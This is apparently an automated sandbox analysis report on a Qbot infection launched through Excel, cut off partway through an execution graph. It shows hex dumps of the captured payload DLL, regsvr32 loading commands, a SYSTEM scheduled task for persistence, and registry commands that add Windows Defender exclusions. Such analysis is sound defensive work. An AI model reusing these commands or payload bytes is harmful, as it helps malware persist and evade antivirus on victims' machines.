                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP
                          Sep 28, 2021 13:16:17.249631882 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 55 89 e5 83 c4 f8 e8 2e 36 00 00 3b d8 0f 84 46 02 00 00 60 03 fb 41 03 c8 50 51 68 25 01 00 00 83 bb fe 53 43 00 00 75 3a 68 00 20 00 00 68 0b 01 00 00 6a 77 6a 3b ff b3
                          Data Ascii: jU.6;F`APQh%SCu:h hjwj;YC~SCPCDU+,1SC1SC]^TCTYCuXDu1TYCuTChYCIXCu!YCPlDR+1IXCIXCZjKZCBSCu
                          Sep 28, 2021 13:16:17.249670029 CEST4INData Raw: 43 00 68 f8 00 00 00 68 d7 01 00 00 ff b3 22 54 43 00 ff b3 af 51 43 00 6a 01 6a 00 ff 93 a0 10 44 00 89 75 f8 31 f6 09 c6 89 b3 0c 59 43 00 8b 75 f8 8d 83 d2 54 43 00 50 6a 40 83 bb 68 59 43 00 00 75 1a ff 93 58 10 44 00 51 2b 0c e4 09 c1 83 a3
                          Data Ascii: Chh"TCQCjjDu1YCuTCPj@hYCuXDQ+hYChYCYbTCTCPPCPDDj1YCYPC<D;tifSCu!WCPhDW1fSC1fSC_NWCRCHRCu%XCPdDU3UHRC
                          Sep 28, 2021 13:16:17.249708891 CEST6INData Raw: 83 bb 5e 51 43 00 00 75 36 50 51 ff b3 be 53 43 00 ff 93 a4 10 44 00 6a 00 89 14 e4 31 d2 09 c2 89 93 5e 51 43 00 5a 81 e1 00 00 00 00 0b 0c e4 83 c4 04 81 e0 00 00 00 00 8f 45 f8 33 45 f8 03 4d 0c 53 89 cb 33 5d 08 89 d9 5b 83 bb ce 54 43 00 00
                          Data Ascii: ^QCu6PQSCDj1^QCZE3EMS3][TCuf,UCu1PQlXCPdDj,)1,UC]EEPQWCPlDPEuTC)3);Mv?QCu3PQSCPdDj1QCY
                          Sep 28, 2021 13:16:17.249747038 CEST7INData Raw: bb 13 53 43 00 00 75 27 50 ff 93 60 10 44 00 89 75 e4 83 e6 00 31 c6 83 a3 13 53 43 00 00 09 b3 13 53 43 00 8b 75 e4 31 c0 0b 04 e4 83 ec fc 89 7d e4 29 ff 09 c7 89 bb a8 50 43 00 8b 7d e4 83 bb 84 58 43 00 00 75 3b 68 00 10 00 00 6a 4b ff b3 49
                          Data Ascii: SCu'P`Du1SCSCu1})PC}XCu;hjKIUC<PCTCUCUCD}1XC}}UCu$pYCpDM+MUCUCMUVCuAXDM1UVC1UVCMTCujj
                          Sep 28, 2021 13:16:17.249798059 CEST8INData Raw: 44 00 57 2b 3c e4 09 c7 83 a3 3f 52 43 00 00 09 bb 3f 52 43 00 5f 31 c0 0b 04 e4 83 c4 04 56 33 34 e4 09 c6 83 a3 b0 52 43 00 00 09 b3 b0 52 43 00 5e 83 bb b3 51 43 00 00 75 26 ff b3 a9 56 43 00 ff b3 78 59 43 00 ff 93 a8 10 44 00 51 83 e1 00 09
                          Data Ascii: DW+<?RC?RC_1V34RCRC^QCu&VCxYCDQQC1QCYEU1SCu7QRRCPhD}+}SCSC}1)RQV34u1^LRCu'P\DULRC1LRCU)EESC
                          Sep 28, 2021 13:16:17.249887943 CEST10INData Raw: 8d 83 d2 54 43 00 50 6a 02 52 83 bb 10 50 43 00 00 75 1e ff 93 58 10 44 00 89 75 f8 83 e6 00 31 c6 83 a3 10 50 43 00 00 31 b3 10 50 43 00 8b 75 f8 57 ff 93 3c 10 44 00 81 e7 00 00 00 00 8f 45 f8 03 7d f8 83 bb c6 54 43 00 00 75 1e ff 93 58 10 44
                          Data Ascii: TCPjRPCuXDu1PC1PCuW<DE}TCuXDu3u1TC1TCuU]WQMY]3_]QPCP]XCPDDW1RCRC_wPCDYCu!ZCPTDu)
                          Sep 28, 2021 13:16:17.249949932 CEST11INData Raw: 84 00 00 00 83 bb 68 58 43 00 00 75 36 68 00 10 00 00 68 e2 00 00 00 68 ef 01 00 00 ff b3 90 50 43 00 ff b3 84 52 43 00 6a 01 ff b3 0d 5a 43 00 ff 93 a0 10 44 00 50 8f 45 f0 ff 75 f0 8f 83 68 58 43 00 8d 83 69 55 43 00 50 ff 93 68 10 44 00 89 75
                          Data Ascii: hXCu6hhhPCRCjZCDPEuhXCiUCPhDu11QCuTCP6QCPDDU3,zSC1zSC]XYCu!4UCPdDUXYC1XYC]}?3RCu jD}+}13RC13RC}
                          Sep 28, 2021 13:16:17.250005960 CEST13INData Raw: 14 00 00 00 89 cf 59 83 3f 00 0f 85 74 fb ff ff 83 bb 26 54 43 00 00 75 1c 6a 00 ff 93 70 10 44 00 56 33 34 e4 09 c6 83 a3 26 54 43 00 00 31 b3 26 54 43 00 5e 83 7f 10 00 0f 85 45 fb ff ff 56 89 c6 31 c6 89 f0 5e 29 f6 33 34 e4 83 ec fc 29 ff 0b
                          Data Ascii: Y?t&TCujpDV34&TC1&TC^EV1^)34)<UVWPCEE3E3EERZu9<S33_4[u)E])]]GU]U1UPXu]3]_]EE
                          Sep 28, 2021 13:16:17.250058889 CEST14INData Raw: 10 44 00 50 8f 45 f8 ff 75 f8 8f 83 5a 54 43 00 ff 76 08 83 bb 98 58 43 00 00 75 25 8d 83 90 52 43 00 50 ff 93 6c 10 44 00 89 7d f8 83 e7 00 09 c7 83 a3 98 58 43 00 00 31 bb 98 58 43 00 8b 7d f8 57 83 bb d8 58 43 00 00 75 18 6a 00 ff 93 70 10 44
                          Data Ascii: DPEuZTCvXCu%RCPlD}XC1XC}WXCujpDj11XCZVTCu}UCujpDWUC1UC_jDYCu:PZCQZCeVCjL@YCjjDPEuYC1PEuVTCRCE
                          Sep 28, 2021 13:16:17.441175938 CEST16INData Raw: 0f 86 4d 02 00 00 83 bb b6 54 43 00 00 75 43 68 00 04 00 00 ff b3 98 52 43 00 ff b3 7e 57 43 00 6a 0d ff b3 a1 55 43 00 ff b3 12 54 43 00 ff b3 88 50 43 00 ff 93 a0 10 44 00 89 7d f8 2b 7d f8 09 c7 83 a3 b6 54 43 00 00 31 bb b6 54 43 00 8b 7d f8
                          Data Ascii: MTCuChRC~WCjUCTCPCD}+}TC1TC}uEu_Wj4)w^PCu&QUCPhDj,11PC])]3_1]YVCu2PQ`D}1YVC1YVC}E3MEEQQu3u1


                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: EXCEL.EXE PID: 344 Parent PID: 596

                          General

                          Start time:13:15:18
                          Start date:28/09/2021
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                          Imagebase:0x13f650000
                          File size:28253536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Chronological Activities

                          Analysis Process: regsvr32.exe PID: 1832 Parent PID: 344

                          General

                          Start time:13:16:50
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd.red
                          Imagebase:0xff050000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: regsvr32.exe PID: 2176 Parent PID: 1832

                          General

                          Start time:13:16:51
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -silent ..\Drezd.red
                          Imagebase:0xac0000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.609100712.0000000000200000.00000004.00000001.sdmp, Author: Joe Security
                          Reputation:moderate

                          Chronological Activities

                          Analysis Process: explorer.exe PID: 2980 Parent PID: 2176

                          General

                          Start time:13:16:52
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0x1b0000
                          File size:2972672 bytes
                          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                          Reputation:high

                          Chronological Activities

                          Analysis Process: regsvr32.exe PID: 2808 Parent PID: 344

                          General

                          Start time:13:16:54
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd1.red
                          Imagebase:0xff050000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: schtasks.exe PID: 2908 Parent PID: 2980

                          General

                          Start time:13:16:54
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30
                          Imagebase:0xf20000
                          File size:179712 bytes
                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: regsvr32.exe PID: 2540 Parent PID: 344

                          General

                          Start time:13:16:55
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd2.red
                          Imagebase:0xff050000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: regsvr32.exe PID: 2932 Parent PID: 1672

                          General

                          Start time:13:16:56
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xffed0000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: regsvr32.exe PID: 2984 Parent PID: 2932

                          General

                          Start time:13:16:57
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xfa0000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.622702900.0000000000420000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Author: Joe Security

                          Chronological Activities

                          Analysis Process: explorer.exe PID: 2072 Parent PID: 2984

                          General

                          Start time:13:16:59
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0x1b0000
                          File size:2972672 bytes
                          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Author: Joe Security

                          Chronological Activities

                          Analysis Process: reg.exe PID: 1840 Parent PID: 2072

                          General

                          Start time:13:17:00
                          Start date:28/09/2021
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0'
                          Imagebase:0xff9b0000
                          File size:74752 bytes
                          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: reg.exe PID: 2092 Parent PID: 2072

                          General

                          Start time:13:17:02
                          Start date:28/09/2021
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Otovcuqo' /d '0'
                          Imagebase:0xff650000
                          File size:74752 bytes
                          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: regsvr32.exe PID: 1476 Parent PID: 1672

                          General

                          Start time:13:18:00
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xff200000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: regsvr32.exe PID: 2532 Parent PID: 1476

                          General

                          Start time:13:18:00
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -s 'C:\Users\user\Drezd.red'
                          Imagebase:0x990000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Disassembly

                          Code Analysis

                          Reset < >

                            Analysis Process: regsvr32.exe PID: 2176 Parent PID: 1832 regsvr32.exeCOMMON

                            Execution Graph

                            Execution Coverage:7.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5.1%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:53

                            Graph

                            execution_graph 9961 10005f82 OutputDebugStringA 9962 10005fa2 9961->9962 9963 100060cc 9961->9963 9990 100085ef HeapCreate 9962->9990 9965 100060d2 SetLastError 9963->9965 9966 10006097 9963->9966 9965->9966 9967 10005fa7 9991 1000980c GetSystemTimeAsFileTime 9967->9991 9969 10005faf 9969->9966 9993 10008f78 9969->9993 9972 10005ffd 9972->9966 9973 10006006 memset 9972->9973 9974 1000601d 9973->9974 9978 1000604c 9974->9978 9996 100095c7 9974->9996 10003 10012a5b 9978->10003 9985 10006092 9988 100085d5 2 API calls 9985->9988 9986 1000609c 10020 100085d5 9986->10020 9988->9966 9990->9967 9992 1000983e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9991->9992 9992->9969 10024 10008604 HeapAlloc 9993->10024 9995 10005fcb GetModuleHandleA GetModuleFileNameW GetLastError 9995->9966 9995->9972 10025 100084ab 9996->10025 9999 100085c2 10000 100085d2 9999->10000 10001 100085ca 9999->10001 10000->9974 10030 1000861a 10001->10030 10004 10012a90 10003->10004 10038 10008669 10004->10038 10006 10006057 10007 1000e1bc 10006->10007 10008 100095c7 HeapAlloc 10007->10008 10009 1000e1cf 10008->10009 10010 1000e1e6 LoadLibraryA 10009->10010 10011 1000e1de GetModuleHandleA 10009->10011 10012 1000e1ed 10010->10012 10011->10012 10013 1000e1fb 10012->10013 10042 1000e171 10012->10042 10015 100085c2 2 API calls 10013->10015 10016 1000606d 10015->10016 10017 100095e1 10016->10017 10054 10008531 10017->10054 10019 1000607e GetFileAttributesW 10019->9985 10019->9986 10021 100085e3 10020->10021 10022 100060a1 CreateThread 10020->10022 10023 1000861a 2 API calls 10021->10023 10022->9966 10059 10005e06 10022->10059 10023->10022 10024->9995 10026 100084c1 10025->10026 10028 10006024 MultiByteToWideChar 10025->10028 10026->10028 10029 10008604 HeapAlloc 10026->10029 10028->9999 10029->10028 10031 10008666 10030->10031 10032 10008624 10030->10032 10031->10000 10032->10031 10035 1000874f 10032->10035 10036 10008758 memset 10035->10036 10037 10008654 HeapFree 10035->10037 10036->10037 10037->10031 10041 10008604 HeapAlloc 10038->10041 10040 1000867a 10040->10006 10041->10040 10047 10008604 HeapAlloc 10042->10047 10044 1000e1b2 10044->10013 10046 1000e183 10046->10044 10048 1000dfad 10046->10048 10047->10046 10049 1000e021 10048->10049 10050 1000dfc6 10048->10050 10049->10046 10050->10049 10051 1000e079 LoadLibraryA 10050->10051 10051->10049 10052 1000e087 GetProcAddress 10051->10052 10052->10049 10053 1000e093 10052->10053 10053->10049 10055 1000854d 10054->10055 10058 10008604 HeapAlloc 10055->10058 10057 10008581 10057->10019 10057->10057 10058->10057 10071 10005eb6 10059->10071 10063 10005e1b 10064 10005e11 10064->10063 10065 10005e4b 10064->10065 10135 1000ca25 10064->10135 10067 10005e82 10065->10067 10068 10005e7b 10065->10068 10067->10063 10171 100030b7 10067->10171 10149 10005c26 10068->10149 10072 1000e1bc 7 API calls 10071->10072 10073 10005eca 10072->10073 10074 1000e1bc 7 API calls 10073->10074 10075 10005ee3 10074->10075 10076 1000e1bc 7 API calls 10075->10076 10077 10005efc 10076->10077 10078 1000e1bc 7 API calls 10077->10078 10079 10005f15 10078->10079 10080 1000e1bc 7 API calls 10079->10080 10081 10005f30 10080->10081 10082 1000e1bc 7 API calls 10081->10082 10083 10005f49 10082->10083 10084 1000e1bc 7 API calls 10083->10084 10085 10005f62 10084->10085 10086 1000e1bc 7 API calls 10085->10086 10087 10005e0b 10086->10087 10088 1000d01f 10087->10088 10178 10008604 HeapAlloc 10088->10178 10090 1000d03a 10091 1000d045 GetCurrentProcessId 10090->10091 10092 1000d3f3 10090->10092 10093 1000d05d 10091->10093 10092->10064 10094 1000d072 GetModuleFileNameW 10093->10094 10095 1000d099 GetCurrentProcess 10094->10095 10096 1000d08c 10094->10096 10179 1000ba05 10095->10179 10096->10095 10098 1000d0a8 10099 1000d0b9 10098->10099 10184 1000ba62 10098->10184 10193 1000e3f1 10099->10193 10104 1000d0ee LookupAccountSidW 10105 1000d140 GetModuleFileNameW GetLastError 10104->10105 10106 1000d13e GetLastError 10104->10106 10108 1000d17f 10105->10108 10106->10105 10202 1000b7a8 memset GetComputerNameW lstrcpynW 10108->10202 10110 1000d196 10212 1000b67d 10110->10212 10113 1000d1bd MultiByteToWideChar 10114 1000d1d1 10113->10114 10222 1000b88a 10114->10222 10119 1000d254 10121 1000d261 10119->10121 10122 1000d266 GetSystemInfo 10119->10122 10120 1000d24a GetCurrentProcess 10120->10119 10123 1000d274 GetWindowsDirectoryW 10121->10123 10122->10123 10124 100095e1 HeapAlloc 10123->10124 10125 1000d297 10124->10125 10126 100085d5 2 API calls 10125->10126 10127 1000d2d1 10126->10127 10129 1000d309 10127->10129 10261 10009640 10127->10261 10241 100122d3 10129->10241 10316 1000c8fd 10135->10316 10138 1000cb6e 10138->10065 10140 1000cb63 10141 1000861a 2 API calls 10140->10141 10141->10138 10142 1000861a 2 API calls 10143 1000cb51 10142->10143 10143->10140 10143->10142 10146 1000cacc GetLastError ResumeThread 10147 1000ca62 10146->10147 10148 1000cafc CloseHandle 10146->10148 10147->10140 10147->10143 10147->10146 10147->10148 10328 1000ae66 memset CreateProcessW 10147->10328 10329 1000cb77 10147->10329 10148->10147 10408 10009b43 10149->10408 10152 10005c51 10152->10063 10153 10005c69 10458 10005d7d 10153->10458 10157 10005cc7 10490 10005aff 10157->10490 10158 10005c78 10160 10005ccc 10158->10160 10161 10005c7d 10158->10161 10162 10005ce8 10160->10162 10170 10005cc5 10160->10170 10503 1000f8cc 10160->10503 10161->10162 10165 1000a86d 5 API calls 10161->10165 10162->10063 10166 10005c9d 10165->10166 10467 10005974 10166->10467 10524 10005a61 10170->10524 11582 10008604 HeapAlloc 10171->11582 10173 100030be 10174 100030f7 10173->10174 11583 10008604 HeapAlloc 10173->11583 10174->10063 10176 100030cf 10176->10174 10177 1000902d _ftol2_sse 10176->10177 10177->10174 10178->10090 10180 1000ba1d 10179->10180 10181 1000ba21 10180->10181 10265 1000b998 GetTokenInformation 10180->10265 10181->10098 10275 1000b946 GetCurrentThread 10184->10275 10187 1000bb18 10187->10099 10188 1000b998 6 API calls 10192 1000ba96 CloseHandle 10188->10192 10190 1000bb0e 10191 1000861a 2 API calls 10190->10191 10191->10187 10192->10187 10192->10190 10195 1000e410 10193->10195 10194 1000d0e3 10197 1000e3b6 10194->10197 10195->10194 10280 100091e3 10195->10280 10198 1000e3cd 10197->10198 10199 1000e3ed 10198->10199 10200 100091e3 HeapAlloc 10198->10200 10199->10104 10201 1000e3da 10200->10201 10201->10104 10203 100095e1 HeapAlloc 10202->10203 10204 1000b7ff GetVolumeInformationW 10203->10204 10205 100085d5 2 API calls 10204->10205 10206 1000b834 10205->10206 10207 10009640 2 API calls 10206->10207 10208 1000b855 lstrcatW 10207->10208 10285 1000c392 10208->10285 10211 1000b87b 10211->10110 10213 1000b698 10212->10213 10214 100095c7 HeapAlloc 10213->10214 10215 1000b6a2 10214->10215 10287 1001242d 10215->10287 10217 1000b6ed 10218 100085c2 2 API calls 10217->10218 10219 1000b6f9 10218->10219 10219->10113 10219->10114 10220 1001242d _ftol2_sse 10221 1000b6b7 10220->10221 10221->10217 10221->10220 10223 100095c7 HeapAlloc 10222->10223 10224 1000b8a5 10223->10224 10225 100095c7 HeapAlloc 10224->10225 10227 1000b8b1 10225->10227 10226 1000b941 GetCurrentProcess 10235 1000bbdf 10226->10235 10227->10226 10228 1001242d _ftol2_sse 10227->10228 10229 1000b902 10227->10229 10228->10227 10230 1001242d _ftol2_sse 10229->10230 10231 1000b92d 10229->10231 10230->10229 10232 100085c2 2 API calls 10231->10232 10233 1000b939 10232->10233 10234 100085c2 2 API calls 10233->10234 10234->10226 10236 1000bbf7 10235->10236 10237 1000b998 6 API calls 10236->10237 10238 1000bbfb memset GetVersionExA 10236->10238 10240 1000bc0f 10237->10240 10238->10119 10238->10120 10239 1000861a 2 API calls 10239->10238 10240->10238 10240->10239 10242 100122de 10241->10242 10244 1000d3d2 10241->10244 10243 1001242d _ftol2_sse 10242->10243 10242->10244 10243->10242 10245 1000902d 10244->10245 10246 1000903d 10245->10246 10246->10246 10247 1001242d _ftol2_sse 10246->10247 10248 10009058 10247->10248 10249 1000908c 10248->10249 10250 1001242d _ftol2_sse 10248->10250 10251 1000cd33 10249->10251 10250->10248 10252 1000cf18 10251->10252 10253 100095c7 HeapAlloc 10252->10253 10255 1000cf48 10252->10255 10258 100085c2 2 API calls 10252->10258 10297 100093be 10252->10297 10253->10252 10290 1000aba3 CreateToolhelp32Snapshot 10255->10290 10257 1000cf5f 10260 1000cf7c 10257->10260 10303 100094b7 10257->10303 10258->10252 10260->10092 10262 1000874f memset 10261->10262 10263 10009654 _vsnwprintf 10262->10263 10264 10009671 10263->10264 10264->10129 10266 1000b9ba GetLastError 10265->10266 10267 1000b9d7 10265->10267 10266->10267 10268 1000b9c5 10266->10268 10267->10098 10274 10008604 HeapAlloc 10268->10274 10270 1000b9cd 10270->10267 10271 1000b9db GetTokenInformation 10270->10271 10271->10267 10272 1000b9f0 10271->10272 10273 1000861a 2 API calls 10272->10273 10273->10267 10274->10270 10276 1000b963 10275->10276 10277 1000b98a 10276->10277 10278 1000b967 GetLastError 10276->10278 10277->10187 10277->10188 10278->10277 10279 1000b974 GetCurrentProcess 10278->10279 10279->10277 10281 100091ec 10280->10281 10283 100091fe 10280->10283 10284 10008604 HeapAlloc 10281->10284 10283->10194 10284->10283 10286 1000b867 CharUpperBuffW 10285->10286 10286->10211 10288 1001243c 10287->10288 10289 10012480 _ftol2_sse 10288->10289 10289->10221 10291 1000abf4 10290->10291 10292 1000abc9 memset Process32First 10290->10292 10291->10257 10292->10291 10293 1000ac02 10292->10293 10295 1000ac15 Process32Next 10293->10295 10295->10293 10299 100093d2 10297->10299 10314 10008604 HeapAlloc 10299->10314 10302 1000942a 10314->10302 10317 1000c91c 10316->10317 10344 10008604 HeapAlloc 10317->10344 10319 1000ca14 10319->10138 10324 1000a86d 10319->10324 10320 100095e1 HeapAlloc 10321 1000c9b7 10320->10321 10321->10319 10321->10320 10322 100085d5 2 API calls 10321->10322 10323 